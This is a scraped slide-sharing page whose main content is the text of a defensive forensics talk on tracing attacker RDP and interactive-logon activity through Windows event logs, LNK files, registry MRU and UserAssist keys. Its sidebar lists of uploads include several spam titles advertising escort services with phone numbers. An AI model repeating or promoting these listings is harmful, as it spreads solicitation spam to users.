Please, Please, PLEASE Defend Your Mobile Apps!
Please, Please, PLEASE Defend Your Mobile Apps!Please, Please, PLEASE Defend Your Mobile Apps!
Please, Please, PLEASE Defend Your Mobile Apps!Jerod Brennen
 
Soccnx11 Two wrongs don't make a right - Troubleshooting Connections
Soccnx11 Two wrongs don't make a right - Troubleshooting Connections Soccnx11 Two wrongs don't make a right - Troubleshooting Connections
Soccnx11 Two wrongs don't make a right - Troubleshooting Connections Nico Meisenzahl
 
Two wrongs don’t make a right – Troubleshooting Connections
Two wrongs don’t make a right – Troubleshooting ConnectionsTwo wrongs don’t make a right – Troubleshooting Connections
Two wrongs don’t make a right – Troubleshooting ConnectionsLetsConnect
 
SocCnx11 - Two wrongs don't make a right - Troubleshooting Connections
SocCnx11 - Two wrongs don't make a right - Troubleshooting ConnectionsSocCnx11 - Two wrongs don't make a right - Troubleshooting Connections
SocCnx11 - Two wrongs don't make a right - Troubleshooting Connectionspanagenda
 
Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...
Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...
Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...PranavPatil822557
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andAlisa Esage Шевченко
 
Container security Familiar problems in new technology
Container security Familiar problems in new technologyContainer security Familiar problems in new technology
Container security Familiar problems in new technologyFrank Victory
 
Automation and open source turning the tide on the attackers
Automation and open source turning the tide on the attackersAutomation and open source turning the tide on the attackers
Automation and open source turning the tide on the attackersFrank Victory
 

More Related Content

Similar to Kealy OWASP interactive_artifacts

Social Connections 13 - Troubleshooting Connections Pink
Social Connections 13 - Troubleshooting Connections PinkSocial Connections 13 - Troubleshooting Connections Pink
Social Connections 13 - Troubleshooting Connections PinkNico Meisenzahl
 
219568662-QUICK-Cloud-Storage-Forensic-Analysis-Presentation.pptx
219568662-QUICK-Cloud-Storage-Forensic-Analysis-Presentation.pptx219568662-QUICK-Cloud-Storage-Forensic-Analysis-Presentation.pptx
219568662-QUICK-Cloud-Storage-Forensic-Analysis-Presentation.pptxSachinGosavi15
 
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced ActorsMemory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced ActorsJared Greenhill
 
Operating System Forensics
Operating System ForensicsOperating System Forensics
Operating System ForensicsArunJS5
 
CSS G11 - Set 4 (CMC 2 - Part 2).pptx
CSS G11 - Set 4 (CMC 2 - Part 2).pptxCSS G11 - Set 4 (CMC 2 - Part 2).pptx
CSS G11 - Set 4 (CMC 2 - Part 2).pptxGeraldenHampas2
 
Thick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdfThick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdfSouvikRoy114738
 
Windows 7 client performance talk - Jeff Stokes
Windows 7 client performance talk - Jeff StokesWindows 7 client performance talk - Jeff Stokes
Windows 7 client performance talk - Jeff StokesJeff Stokes
 
Windows 7 New Features By Shraddha Shah
Windows 7 New Features By Shraddha ShahWindows 7 New Features By Shraddha Shah
Windows 7 New Features By Shraddha ShahShraddha055
 
Lesson 3 - Understanding Native Applications, Tools, Mobility, and Remote Man...
Lesson 3 - Understanding Native Applications, Tools, Mobility, and Remote Man...Lesson 3 - Understanding Native Applications, Tools, Mobility, and Remote Man...
Lesson 3 - Understanding Native Applications, Tools, Mobility, and Remote Man...Gene Carboni
 
Apache Flink for IoT: How Event-Time Processing Enables Easy and Accurate Ana...
Apache Flink for IoT: How Event-Time Processing Enables Easy and Accurate Ana...Apache Flink for IoT: How Event-Time Processing Enables Easy and Accurate Ana...
Apache Flink for IoT: How Event-Time Processing Enables Easy and Accurate Ana...Big Data Spain
 
SplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based securitySplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based securitySplunk
 
williams-wwhf-20210617-eventlogs.pdf
williams-wwhf-20210617-eventlogs.pdfwilliams-wwhf-20210617-eventlogs.pdf
williams-wwhf-20210617-eventlogs.pdfVinceVulpes
 
Please, Please, PLEASE Defend Your Mobile Apps!
Please, Please, PLEASE Defend Your Mobile Apps!Please, Please, PLEASE Defend Your Mobile Apps!
Please, Please, PLEASE Defend Your Mobile Apps!Jerod Brennen
 
Soccnx11 Two wrongs don't make a right - Troubleshooting Connections
Soccnx11 Two wrongs don't make a right - Troubleshooting Connections Soccnx11 Two wrongs don't make a right - Troubleshooting Connections
Soccnx11 Two wrongs don't make a right - Troubleshooting Connections Nico Meisenzahl
 
Two wrongs don’t make a right – Troubleshooting Connections
Two wrongs don’t make a right – Troubleshooting ConnectionsTwo wrongs don’t make a right – Troubleshooting Connections
Two wrongs don’t make a right – Troubleshooting ConnectionsLetsConnect
 
SocCnx11 - Two wrongs don't make a right - Troubleshooting Connections
SocCnx11 - Two wrongs don't make a right - Troubleshooting ConnectionsSocCnx11 - Two wrongs don't make a right - Troubleshooting Connections
SocCnx11 - Two wrongs don't make a right - Troubleshooting Connectionspanagenda
 
Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...
Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...
Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...PranavPatil822557
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andAlisa Esage Шевченко
 

Similar to Kealy OWASP interactive_artifacts (20)

Social Connections 13 - Troubleshooting Connections Pink
Social Connections 13 - Troubleshooting Connections PinkSocial Connections 13 - Troubleshooting Connections Pink
Social Connections 13 - Troubleshooting Connections Pink
 
219568662-QUICK-Cloud-Storage-Forensic-Analysis-Presentation.pptx
219568662-QUICK-Cloud-Storage-Forensic-Analysis-Presentation.pptx219568662-QUICK-Cloud-Storage-Forensic-Analysis-Presentation.pptx
219568662-QUICK-Cloud-Storage-Forensic-Analysis-Presentation.pptx
 
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced ActorsMemory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
 
Operating System Forensics
Operating System ForensicsOperating System Forensics
Operating System Forensics
 
CSS G11 - Set 4 (CMC 2 - Part 2).pptx
CSS G11 - Set 4 (CMC 2 - Part 2).pptxCSS G11 - Set 4 (CMC 2 - Part 2).pptx
CSS G11 - Set 4 (CMC 2 - Part 2).pptx
 
Thick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdfThick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdf
 
Windows 7 client performance talk - Jeff Stokes
Windows 7 client performance talk - Jeff StokesWindows 7 client performance talk - Jeff Stokes
Windows 7 client performance talk - Jeff Stokes
 
IIS Web Ecosystem
IIS Web EcosystemIIS Web Ecosystem
IIS Web Ecosystem
 
Presentation
PresentationPresentation
Presentation
 
Windows 7 New Features By Shraddha Shah
Windows 7 New Features By Shraddha ShahWindows 7 New Features By Shraddha Shah
Windows 7 New Features By Shraddha Shah
 
Lesson 3 - Understanding Native Applications, Tools, Mobility, and Remote Man...
Lesson 3 - Understanding Native Applications, Tools, Mobility, and Remote Man...Lesson 3 - Understanding Native Applications, Tools, Mobility, and Remote Man...
Lesson 3 - Understanding Native Applications, Tools, Mobility, and Remote Man...
 
Apache Flink for IoT: How Event-Time Processing Enables Easy and Accurate Ana...
Apache Flink for IoT: How Event-Time Processing Enables Easy and Accurate Ana...Apache Flink for IoT: How Event-Time Processing Enables Easy and Accurate Ana...
Apache Flink for IoT: How Event-Time Processing Enables Easy and Accurate Ana...
 
SplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based securitySplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based security
 
williams-wwhf-20210617-eventlogs.pdf
williams-wwhf-20210617-eventlogs.pdfwilliams-wwhf-20210617-eventlogs.pdf
williams-wwhf-20210617-eventlogs.pdf
 
Please, Please, PLEASE Defend Your Mobile Apps!
Please, Please, PLEASE Defend Your Mobile Apps!Please, Please, PLEASE Defend Your Mobile Apps!
Please, Please, PLEASE Defend Your Mobile Apps!
 
Soccnx11 Two wrongs don't make a right - Troubleshooting Connections
Soccnx11 Two wrongs don't make a right - Troubleshooting Connections Soccnx11 Two wrongs don't make a right - Troubleshooting Connections
Soccnx11 Two wrongs don't make a right - Troubleshooting Connections
 
Two wrongs don’t make a right – Troubleshooting Connections
Two wrongs don’t make a right – Troubleshooting ConnectionsTwo wrongs don’t make a right – Troubleshooting Connections
Two wrongs don’t make a right – Troubleshooting Connections
 
SocCnx11 - Two wrongs don't make a right - Troubleshooting Connections
SocCnx11 - Two wrongs don't make a right - Troubleshooting ConnectionsSocCnx11 - Two wrongs don't make a right - Troubleshooting Connections
SocCnx11 - Two wrongs don't make a right - Troubleshooting Connections
 
Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...
Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...
Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits and
 

More from Frank Victory

Container security Familiar problems in new technology
Container security Familiar problems in new technologyContainer security Familiar problems in new technology
Container security Familiar problems in new technologyFrank Victory
 
Automation and open source turning the tide on the attackers
Automation and open source turning the tide on the attackersAutomation and open source turning the tide on the attackers
Automation and open source turning the tide on the attackersFrank Victory
 
CNG 256 cloud computing
CNG 256 cloud computingCNG 256 cloud computing
CNG 256 cloud computingFrank Victory
 
CNG 256 wireless wi-fi and bluetooth
CNG 256 wireless wi-fi and bluetoothCNG 256 wireless wi-fi and bluetooth
CNG 256 wireless wi-fi and bluetoothFrank Victory
 
Differential learning SnowFROC 2017
Differential learning SnowFROC 2017Differential learning SnowFROC 2017
Differential learning SnowFROC 2017Frank Victory
 
Phishing Forensics - SnowFROC - Denver Chapter of OWASP
Phishing Forensics - SnowFROC - Denver Chapter of OWASP Phishing Forensics - SnowFROC - Denver Chapter of OWASP
Phishing Forensics - SnowFROC - Denver Chapter of OWASP Frank Victory
 
Active defensecombo clean
Active defensecombo cleanActive defensecombo clean
Active defensecombo cleanFrank Victory
 
Dns security threats and solutions
Dns security threats and solutionsDns security threats and solutions
Dns security threats and solutionsFrank Victory
 
Cng 125 – chapter 12 network policies
Cng 125 – chapter 12 network policiesCng 125 – chapter 12 network policies
Cng 125 – chapter 12 network policiesFrank Victory
 
Authentication vs authorization
Authentication vs authorizationAuthentication vs authorization
Authentication vs authorizationFrank Victory
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacksFrank Victory
 

More from Frank Victory (12)

Container security Familiar problems in new technology
Container security Familiar problems in new technologyContainer security Familiar problems in new technology
Container security Familiar problems in new technology
 
Automation and open source turning the tide on the attackers
Automation and open source turning the tide on the attackersAutomation and open source turning the tide on the attackers
Automation and open source turning the tide on the attackers
 
CNG 256 cloud computing
CNG 256 cloud computingCNG 256 cloud computing
CNG 256 cloud computing
 
CNG 256 wireless wi-fi and bluetooth
CNG 256 wireless wi-fi and bluetoothCNG 256 wireless wi-fi and bluetooth
CNG 256 wireless wi-fi and bluetooth
 
Differential learning SnowFROC 2017
Differential learning SnowFROC 2017Differential learning SnowFROC 2017
Differential learning SnowFROC 2017
 
Phishing Forensics - SnowFROC - Denver Chapter of OWASP
Phishing Forensics - SnowFROC - Denver Chapter of OWASP Phishing Forensics - SnowFROC - Denver Chapter of OWASP
Phishing Forensics - SnowFROC - Denver Chapter of OWASP
 
Active defensecombo clean
Active defensecombo cleanActive defensecombo clean
Active defensecombo clean
 
Dns security threats and solutions
Dns security threats and solutionsDns security threats and solutions
Dns security threats and solutions
 
Cng 125 – chapter 12 network policies
Cng 125 – chapter 12 network policiesCng 125 – chapter 12 network policies
Cng 125 – chapter 12 network policies
 
Authentication vs authorization
Authentication vs authorizationAuthentication vs authorization
Authentication vs authorization
 
9.0 security (2)
9.0 security (2)9.0 security (2)
9.0 security (2)
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacks
 

Recently uploaded

Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAndikSusilo4
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 

Recently uploaded (20)

Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & Application
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 

Kealy OWASP interactive_artifacts

  • 1. 1 Using Interactive Artifacts to Track Attacker Actions § Phillip Kealy
  • 2. 2 Overview § Background § Disclaimer § Presentation Goals § Interactive Artifact Overview § Case Study + Interactive Artifacts § Scaling Investigations using Interactive Artifacts
  • 3. 3 Background § Who am I? § Career - Operational - CIRT - Security Manager - Consulting
  • 4. 4 DISCLAIMER Case studies and examples are drawn from our experiences and activities working for a variety of customers, and do not represent our work for any one customer or set of customers. In many cases, facts have been changed to obscure the identity of our customers and individuals associated with our customers.
  • 5. 5 Presentation Goals § Define Methods for Interactive Logons § Provide overview of available artifacts § Methods to use multiple evidence sources to provide in-depth story
  • 6. 6 What are Interactive artifacts? § Forensic Artifacts that record user activity during an interactive logon session § Examples of interactive logon sessions: - Physically at the keyboard - Remote Desktop - Third Party Utilities • Screen Connect • VNC • More - PsExec
  • 7. 7 User Profiles What happens upon a user’s first interactive user logon? § Log Entries (More on this shortly) § Creation of user profile - “C:users%USERNAME%” - User registry hives § A user profile can prove an interactive logon occurred, even without event log evidence RDP frank ITJumpServer “C:usersfrank*” created
  • 8. 8 Case Study – FIN9 § Financially Motivated Attacker § Uses minimal malware for initial access and to maintain presence § Exploits business processes and systems for financial gain
  • 9. 9 Targeted Attack Lifecycle – FIN9 • Phishing Email • Word document with macros • Netwire • TeamViewer • ScreenConnect • EMCO • Dameware • NanoCore • MimiKatz • Keystroke logging • Fake Logon Screen • Sticky Keys • Built-in Windows Utilities • Net commands • File shares • Search for systems of interest • Legitimate Access to apps • Direct DB access using 1ClickDB • Remote Desktop • File Shares • Netwire • TeamViewer • ScreenConnect • EMCO • SoftTokenCertificate theft
  • 11. 11 Initial Lead § Fraud Department located Unauthorized Gift Cards issued on January 22, 209 § Suspicious rewards Database interaction on January 22, 2019 traced back to WebServerA § Live response analysis indicated attacker installed 1ClickDB via a remote desktop logon session on WebServerA using Domain Admin account Frank - RDP session to install 1ClickDB occurred on January 19, 2019 between 03:44:56 UTC and 04:55:56 UTC from a system at an unknown IP address § IIS web server logs on WebServerA recorded access to 1ClickDB from the IP address of ITJumpServer - Connections to 1ClickDB webpage occurred on January 22, 2019 between 01:45:33 UTC and 02:30:12 UTC § Now what? - Live response analysis of WebServerA
  • 12. 12 Windows Logon Events Type 2 – Interactive - Physical console - Screen sharing - “RunAs” - PsExec Type 10 – Remote Interactive - Remote Desktop / Terminal Services Type 7 – Credentials used to unlock screen Type 12 – Cached remote interactive Type 13 – Cached unlock
  • 13. 13 Type 10 Logon – RDP Unknown System An account was successfully logged on. User Name: franktheadmin Domain: Rewards Logon ID: (0x0,0x151F248) Logon Type: 10 Logon Process: User32 Authentication Package: Negotiate Workstation Name: ITJumpServer Source Network Address: 192.168.1.101 RDP “Rewards” Domain Controller Security Event Log EID 4624 ITJumpServer
  • 14. 14 RDP Event Logs Microsoft-Windows-TerminalServices-RemoteconnectionManager/Operational Date & Time EID Message 2019-01-22 01:33:23 1149 Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101 2019-01-22 01:33:23 21 Remote Desktop Services: Session logon succeeded User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 2019-01-22 02:39:45 23 Remote Desktop Services: Session logoff succeeded: User: rewardsdave Session ID: 2 2019-01-22 02:39:45 24 Remote Desktop Services: Session has been disconnected: User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101
  • 15. 15 User Registry Hives Users<username> Windows Vista/2008+ NTUSER.DAT HKEY_USERS<User SID>_Classes HKEY_USERS<User SID> Users<username>AppDataLocalMicrosoftWindows Windows Vista/2008+ USRCLASS.DAT Registry Hive PathsRegistry Files on Disk
  • 16. 16 LNK Files § Windows shortcut files § Auto-generated when file opened in Explorer § Supports “Recent Files” / “Recent Docs” functionality Windows Vista, 7, Server 2008 – LNK File Paths C:Users%USERNAME%AppDataRoamingMicrosoftWindowsRecent C:Users%USERNAME%AppDataRoamingMicrosoftOfficeRecent
  • 17. 17 Data within LNK Files § Full file path (local or network) § Attributes and logical size § MAC timestamps for the referenced file at the time it was last opened § Output from “lnkparse.py” lnkparse.py - sourceforge.net/projects /jafat/files/lnk-parse/
  • 18. 18 LNK File of interest Date & Time Timestamp File Name 2019-01-22 01:39:23 Created C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk Date & Time Timestamp 2019-01-22 01:36:23 Created, Modified, Accessed C:UsersdaveDesktopresult.txt
  • 19. 19 Most Recently Used (MRU) Keys “RecentDocs” Recently opened files Multiple Subkeys for file types HKEY_USERS{SID}SoftwareMicrosoftWindowsCu rrentVersionExplorerRecentDocs .ini, .pem, .txt, .doc, .rdg, .zip, Folder, etc. § Binary Format § Stores most recent 10 opened files Key Last Write Registry Key Parsed MRU Value 2019-01-22 01:36:23 SoftwareMicrosoftWindowsCurrentVersionExpl orerRecentDocs.txt 0 = result.txt 2019-01-22 01:35:34 SoftwareMicrosoftWindowsCurrentVersionExpl orerRecentDocs.zip 0 = omg.zip
  • 20. 20 Anatomy of a Registry Key Example: Run key Key: HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun Value Name: NotMalware Value Data: C:ProgramDataTotallyMalwareEvil.exe
  • 21. 21 Anatomy of a Registry Key Example: Run key Key Last Modified: 2017-06-05 19:33:51 § Values inherit Last Modified time from their parent key
  • 22. 22 A timestamp is applied to the ‘Key’, and is updated when… 1) Key created 2) Value created/deleted 3) Data of any Value is modified Note: Registry timestamps can be modified, although this is not very common Registry Timestamps
  • 23. 23 Evidence of Execution Default Enabled User Agnostic All Windows Versions Execution Visibility ShimCache Yes Yes Yes Yes AmCache Yes Yes No Yes UserAssist Yes No Yes GUI only MUICache Yes No Yes GUI only Prefetch Workstations only Yes Yes Yes Windows Events No Yes Yes Yes WMI RUA No Yes Yes Yes
  • 24. 24 UserAssist and MUICache Tracks files opened in Windows Explorer HKCU{SID}SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist HKCU{SID}SoftwareMicrosoftWindowsShellNoRoamMUICache UserAssist One value per executable file • ROT13 encoded Number of times each program ran Last execution time MUICache One value per executable file • Clear-text Records “FileDescription” for PE files
  • 25. 25 UserAssist Evidence userassist v.20080726 (NTUSER.DAT) Displays contents of UserAssist Active Desktop key UserAssist (Active Desktop) SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{75048700-EF1F-11D0-9888- 006097DEACF9}Count LastWrite Time Fri Jul 29 21:46:41 2011 (UTC) Fri Jul 29 21:46:41 2017 (UTC) UEME_RUNPATH (3) UEME_RUNPATH:C:Program Files7-Zip7zFM.exe (1) Fri Jul 29 21:46:17 2017 (UTC) UEME_RUNPATH:C:Program FilesWindows NTAccessoriesWORDPAD.EXE (1) Fri Jul 29 21:44:45 2017 (UTC) UEME_RUNPIDL:%csidl2%Internet Explorer.lnk (15) UEME_RUNPATH:C:Program FilesInternet ExplorerIEXPLORE.EXE (1) Raw contents of UserAssist key Decoded UserAssist data
